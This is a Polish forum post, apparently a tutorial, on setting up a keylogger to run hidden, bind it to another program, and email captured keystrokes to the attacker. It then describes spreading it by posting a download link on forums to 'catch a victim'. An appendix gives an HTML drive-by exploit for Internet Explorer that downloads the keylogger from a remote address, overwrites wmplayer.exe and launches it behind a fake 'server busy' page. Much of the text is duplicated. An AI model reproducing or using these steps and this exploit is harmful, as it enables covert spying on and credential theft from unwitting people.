Nie wiem czemu niektorzy maja problemy z konfiguracja tego keyloggera ;s
Tworzymy mejla. Masz juz? Kij mnie to, zakladaj. Wejdz na http://poczta.wp.pl i zaloz tam konto
Pobieramy TO, pozniej TO. Instalacji i rejestracji nie bede opisywac, jesli masz z tym problemy - pisz smialo.
Klikamy PPM na taka ikonke w trayu [jesli nie wiesz co to jest - pisz smialo]
Wybieramy Engine Builder
Dajemy Dalej. Teraz wazny moment, bindujemy z innym programem.
Dalej... Mozna zaznaczyc wedle wlasnych upodoban [jesli nie wiesz co jakie slowo oznacza - http://translate.pl lub pisz smialo]
Dalej... Nic nie zmieniamy, dalej... Znow dalej... Teraz zaznaczamy Start in hidden mode
Dalej... Ja ustawie aby wysylalo logi tylko na maila.
Teraz drugi wazny moment, ustawiamy maila.
Gdzie nasz [email protected] to stworzony przez nas mail, smtp.wp.pl to serwer, user to uzytkownik do serwera SMTP, a password to haslo do tego uzytkownika.
Klikamy test. Wchodzimy na http://mini.poczta.wp.pl/ i sprawdzamy czy nie ma tam czegos takiego
Jesli jest - cieszymy sie, nie ma - ustawiamy od nowa maila.
Dalej...
Klikamy na Browse i szukamy pulpitu. Jak znajdziemy to dajemy Zapisz i Dalej. Na koniec Zakoncz i masz keyloggera.
Teraz tworzymy jakies konto FTP [moze byc rapidshare, lecz lepiej konto ftp] na np cba.pl. Wrzucamy tam plik i dajemy link na forum, aby zlapac ofiare. Jesli otworzyla go to za 30 min dostaniemy na maila loga.
DODATEK
Dla ofiar ktore korzystaja z IE, nie maja AV i FW, mozna stworzyc exploita. Generujemy serwer tak jak juz to opisalem lecz nie bindujemy go. Zakladamy konto na chociazby cba.pl.
Otwieramy notatnik i piszemy w nim cos takiego:
Wypelniamy ten kod i wrzucamy na serwer jako index.html. Dajemy link ofiarze z IE bez AV I FW, a jej keylogger odpali sie samoczynnie.
Pytania? Sugestie? Uwagi? Pisz!
btw.
Przepraszam za powalona cala gramatyke i ortografie, ale pisze to na szybko i nawet do worda nie chce mi sie wrzucic [pierwsza sprawa est to ze go w ogole nie posiadam ;d]
Tworzymy mejla. Masz juz? Kij mnie to, zakladaj. Wejdz na http://poczta.wp.pl i zaloz tam konto
Pobieramy TO, pozniej TO. Instalacji i rejestracji nie bede opisywac, jesli masz z tym problemy - pisz smialo.
Klikamy PPM na taka ikonke w trayu [jesli nie wiesz co to jest - pisz smialo]
Wybieramy Engine Builder
Dajemy Dalej. Teraz wazny moment, bindujemy z innym programem.
Dalej... Mozna zaznaczyc wedle wlasnych upodoban [jesli nie wiesz co jakie slowo oznacza - http://translate.pl lub pisz smialo]
Dalej... Nic nie zmieniamy, dalej... Znow dalej... Teraz zaznaczamy Start in hidden mode
Dalej... Ja ustawie aby wysylalo logi tylko na maila.
Teraz drugi wazny moment, ustawiamy maila.
Gdzie nasz [email protected] to stworzony przez nas mail, smtp.wp.pl to serwer, user to uzytkownik do serwera SMTP, a password to haslo do tego uzytkownika.
Klikamy test. Wchodzimy na http://mini.poczta.wp.pl/ i sprawdzamy czy nie ma tam czegos takiego
Jesli jest - cieszymy sie, nie ma - ustawiamy od nowa maila.
Dalej...
Klikamy na Browse i szukamy pulpitu. Jak znajdziemy to dajemy Zapisz i Dalej. Na koniec Zakoncz i masz keyloggera.
Teraz tworzymy jakies konto FTP [moze byc rapidshare, lecz lepiej konto ftp] na np cba.pl. Wrzucamy tam plik i dajemy link na forum, aby zlapac ofiare. Jesli otworzyla go to za 30 min dostaniemy na maila loga.
DODATEK
Dla ofiar ktore korzystaja z IE, nie maja AV i FW, mozna stworzyc exploita. Generujemy serwer tak jak juz to opisalem lecz nie bindujemy go. Zakladamy konto na chociazby cba.pl.
Otwieramy notatnik i piszemy w nim cos takiego:
Kod:
<HTML>
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "ADRES KEYLOGGERA",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:Program FilesWindows Media Playerwmplayer.exe",2);
location.href = "mms://";
</textarea>
TUTAJ MOŻEMY COŚ DODAĆ [np. Server is extremely busy at this moment. Please wait when server generate mirror for you...]
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/rn/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^s+/,"");
line = line.replace(/s+$/,"");
line = line.replace(/'/g,"'");
line = line.replace(/[]/g,"");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line + 'rn';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media");
}
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>
<script>function go(){ self.location.href='ADRES STRONY KTORA WYSWIETLI SIE PO ZALADOWANIU KEYLEGGERA [np. wlasnie ten mirror]'; }
setTimeout('go()',10000); </script>
</HTML>Wypelniamy ten kod i wrzucamy na serwer jako index.html. Dajemy link ofiarze z IE bez AV I FW, a jej keylogger odpali sie samoczynnie.
Pytania? Sugestie? Uwagi? Pisz!
btw.
Przepraszam za powalona cala gramatyke i ortografie, ale pisze to na szybko i nawet do worda nie chce mi sie wrzucic [pierwsza sprawa est to ze go w ogole nie posiadam ;d]
) i teraz pytanie: jak usunąć to z kompa ofiary jeśli jest już niepotrzebne :nauka: